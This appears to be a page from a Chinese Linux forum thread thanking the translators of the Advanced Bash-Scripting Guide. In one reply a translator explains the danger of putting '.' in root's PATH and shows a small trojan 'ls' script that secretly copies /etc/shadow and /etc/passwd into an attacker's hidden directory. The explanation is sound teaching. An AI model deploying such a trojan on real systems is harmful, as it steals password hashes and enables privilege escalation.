高级Bash脚本编程指南(Advanced Bash-Scripting Guide)：[最新]中文正式3.9.1版发布 - 第13页

**linlin911911** · 07-11-05, 16:04

惊人的毅力啊，多谢你们的辛勤劳动。

**dddddrrrr** · 07-11-19, 19:01

"因为由于安全的因素[译者注：如果你感兴趣的话，其中一个安全漏洞可在LinuxSir的Shell版中我发的一篇帖子里找到]当前目录默认不加入到用户的$PATH.变量中。"
我想查看该帖,能否给出一个确切地址,我搜索不到
-__-
谢谢!

**xyghui** · 07-11-21, 10:28

谢谢你们了.真的是功德无量

**intact** · 07-11-27, 13:29

不错，支持一下。

**intact** · 07-11-27, 13:50

不错，支持一下。

**letueo** · 07-12-05, 10:59

kiron的精神让我们感动!

**kiron** · 07-12-13, 14:31

引用:

作者: dddddrrrr

"因为由于安全的因素[译者注：如果你感兴趣的话，其中一个安全漏洞可在LinuxSir的Shell版中我发的一篇帖子里找到]当前目录默认不加入到用户的$PATH.变量中。"
我想查看该帖,能否给出一个确切地址,我搜索不到
-__-
谢谢!

链接我也找不到了。。。在这儿简单说一下吧。
这个漏洞其实很老也很简单，如果是root把当前目录.加到PATH环境变量的开头，
像这样：PATH=.:$PATH，因为SHELL寻找命令所在的目录时，按PATH变量值中以:分割的各个目录中依次寻找命令。上面这样设置时会使当前目录的优先级最高。
现在有一个恶意用户a,家目录是/home/a，在他的家目录下写了一个脚本，类似像下面的：

代码:

#!/bin/bash
mkdir /home/a/.hidden >/dev/null 2>&1 
cp /etc/shadow /etc/passwd /home/a/.hidden >/dev/null 2>&1
chown -R a.a /home/a/.hidden >/dev/null 2>&1
/bin/ls

命名为ls
这样，当ROOT某天在进入a用户的家目录做常规检查时，习惯性的输入ls时，执行的是恶意用户a的脚本，不是/bin/ls，a用户就这样窃取了密码文件。
当然恶意用户目的不一定是窃取密码文件，也可能是做在sudo的配置文件中加入自己为超级用户之类的坏事。

**grassroots** · 07-12-13, 14:59

辛苦了, 一定要顶一下, 刚进这个论坛,就发现这样的好东东

**xingzhel** · 07-12-13, 19:04

这么好的东西，不顶真的是对不起编者，谢谢分享，太谢谢了！

**lmoking** · 07-12-14, 12:59

二位，真是太强了。对我们初学者是一个莫大的帮助。

**lanyao** · 07-12-18, 10:06

这个要支持，谢谢！

**taurusivy** · 07-12-23, 17:28

佩服毅力，赞无私分享精神~！

**tsrjzq** · 07-12-31, 00:27

工程量太浩大量，敬佩！

**mcsrainbow** · 08-01-02, 15:09

惊人的毅力啊，太感谢了！！

**suntsh** · 08-01-25, 09:59

下载地址打不开了？

07-11-05, 16:04	第 181 帖
linlin911911 注册会员注册日期: Jan 2005 帖子: 84 精华: 1	惊人的毅力啊，多谢你们的辛勤劳动。 __________________ It's stupid to spend much time setuping many kinds of GNU/Linux distributions. We just use OS,not played with OS. A recommonded place to learn linux kernel is the following web sit: http://kernelnewbies.org/ OS:centos5+Gentoo+XPsp2 learning LFS+BLFS ,and vim...

07-11-21, 10:28	第 183 帖
xyghui 注册会员注册日期: Nov 2007 帖子: 1 精华: 0	标题: 谢谢你们谢谢你们了.真的是功德无量

07-11-27, 13:29	第 184 帖
intact 注册会员注册日期: Sep 2003 帖子: 81 精华: 0	不错，支持一下。 __________________ AMD Sempron 2800+/1G DDR333/Raedon 9200SE/120G+30G ALFS 6.1.1 + BLFS 6.1 LiveCD 6.1.1-3 编译 ALFS 6.1.1 共耗时 3h20m03s （光驱太老，全花在读光驱上了。55555555 ... ...）正在按需制作所有需要的 BLFS 包的 xml 文件 ... ...

07-12-14, 12:59	第 190 帖
lmoking 注册会员注册日期: Sep 2007 帖子: 1 精华: 0	二位，真是太强了。对我们初学者是一个莫大的帮助。 __________________ Linux----Separates The Men From The Boys Ubuntu 7.10 Linux kernel 2.6.22 P4CPU ATIX550 160G

07-12-23, 17:28	第 192 帖
taurusivy 注册会员注册日期: Mar 2005 我的住址: bj 帖子: 161 精华: 0	佩服毅力，赞无私分享精神~！ __________________ ThinkPad R51 1829 DC0 ATI Radeon Mobility 9000 Centrino 1.7GHz 512MB 60G RedHat 2.4.20-8/2.4.32/2.6.15 Ubuntu dapper 2.6.15

欢迎来到LinuxSir.Org!
您还未登录，请登录后查看论坛，或者点击论坛上方的注册链接注册新账号。

07-11-19, 19:01	第 182 帖
dddddrrrr 注册会员注册日期: Nov 2006 帖子: 5 精华: 0	"因为由于安全的因素[译者注：如果你感兴趣的话，其中一个安全漏洞可在LinuxSir的Shell版中我发的一篇帖子里找到]当前目录默认不加入到用户的$PATH.变量中。" 我想查看该帖,能否给出一个确切地址,我搜索不到 -__- 谢谢!

07-11-27, 13:50	第 185 帖
intact 注册会员注册日期: Sep 2003 帖子: 81 精华: 0	不错，支持一下。

07-12-05, 10:59	第 186 帖
letueo 注册会员注册日期: Nov 2007 帖子: 22 精华: 0	kiron的精神让我们感动!

07-12-13, 14:59	第 188 帖
grassroots 注册会员注册日期: Dec 2007 帖子: 1 精华: 0	辛苦了, 一定要顶一下, 刚进这个论坛,就发现这样的好东东

07-12-13, 19:04	第 189 帖
xingzhel 注册会员注册日期: Dec 2007 帖子: 1 精华: 0	这么好的东西，不顶真的是对不起编者，谢谢分享，太谢谢了！

07-12-18, 10:06	第 191 帖
lanyao 注册会员注册日期: Jan 2004 帖子: 295 精华: 0	这个要支持，谢谢！

07-12-31, 00:27	第 193 帖
tsrjzq 注册会员注册日期: Feb 2006 帖子: 59 精华: 0	工程量太浩大量，敬佩！

08-01-02, 15:09	第 194 帖
mcsrainbow 注册会员注册日期: Aug 2006 帖子: 7 精华: 0	惊人的毅力啊，太感谢了！！

08-01-25, 09:59	第 195 帖
suntsh 注册会员注册日期: Jan 2008 帖子: 1 精华: 0	下载地址打不开了？